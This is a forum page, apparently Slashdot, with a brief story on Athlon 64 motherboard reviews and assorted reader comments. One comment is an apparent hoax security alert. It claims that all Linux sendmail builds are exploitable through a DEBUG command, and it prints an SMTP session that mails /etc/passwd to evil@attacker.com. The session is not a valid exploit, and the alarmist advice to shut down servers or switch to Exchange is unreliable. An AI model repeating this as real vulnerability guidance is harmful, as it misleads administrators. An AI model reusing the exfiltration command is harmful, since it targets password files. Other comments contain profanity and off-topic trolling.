Athlon 64 Motherboard Triple Threat Round-Up

SpinnerBait writes "Soon after AMD released the Athlon 64 to the public, eager motherboard manufacturers unveiled their latest motherboards for AMD's new baby. Some are offering basic packages that boast features and performance, yet forgo the extras found in premium bundles. Other manufacturers are offering snazzy new packages with all kinds of extras and unique features. The only thing left to do is decide which one is for you. HotHardware has an article posted up, that showcases and benchmarks three top Athlon 64 motherboards, from Asus, MSI and Shuttle. These boards are looking more refined every day."

Linux news

Please mod this up as it is imperative that this news get to the Linux community ASAP - it concerns a new sendmail vulnerability which has recently been made public and is simple to exploit.

Unfortunately, it appears that most sendmail binaries that are distributed with Linux were inadvertently built with the DEBUG flag, which makes this exploit possible. I have tested all the linux distro's I have access to and found them ALL to be vulnerable.

The exploit works as follows -

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from:
250 OK
rcpt to:
250 OK
data
354 Start mail input; end with .
mail evil@attacker.com /etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

Opening a connection to a vulnerable SMTP server and executing the above will result in your password, shadow, or whatever file the attacker desires being emailed to evil@attacker.com! Given that the most recent versions of Crack and Jack the Ripper make cracking even the most complex MD5 or blowfish passwords a trivial exercise, this is a serious problem.

The open source community has been slow to address this issue, which was made public 3 days ago on the mailing list Buqtraq (a CERT Advisory was issued the following day).

Since no patch has been made available by the open source community, there are not many options besides taking down your Linux mail server.

Alternatively, MS Exchange and the OpenBSD 3.3 sendmail binaries (once again, Theo is ahead of the game!) do NOT have this defect, so you might consider switching your mail server to one of these platforms.

I realize this is going to create an extremely long and hectic night for a lot of sys admins out there, but better that one stays up late tonight than comes in Monday morning to a compromised network.

Take this third post...

and fsck it!

FP?

Holy fuck!

Re:Note to self:

jesus listened to vinyl [vpiindustries.com]

1. Vinyl uses *ONE* track to store *TWO* audio channels, using an *OLD* *ANALOGUE* encoding scheme which introduces interchannel modulation, distortion and noise. Which is further compounded when your $10,000 player decodes it.

2. The higher the frequency within a vinyl track, the finer the peaks. Those peaks get gradually *RUBBED OFF* as the needle moves through them. The result of this is typically that the high end gets attenuated after each play.

Defeating wow, flutter and rumble in a vinyl deck to the point where they are unmeasurable is an admirable feat. But what is the point of even trying to do that when your two channels are encoded into one and you loose high end more and more after each play?

Then factor in that a $100 CD player from Target beats the crap out of a $10,000 vinly deck!

What - is - the - point?

Re:How about some more pro features?

Why?
Are they in the way?
Do you have something against getting many kinds of ports/connectors?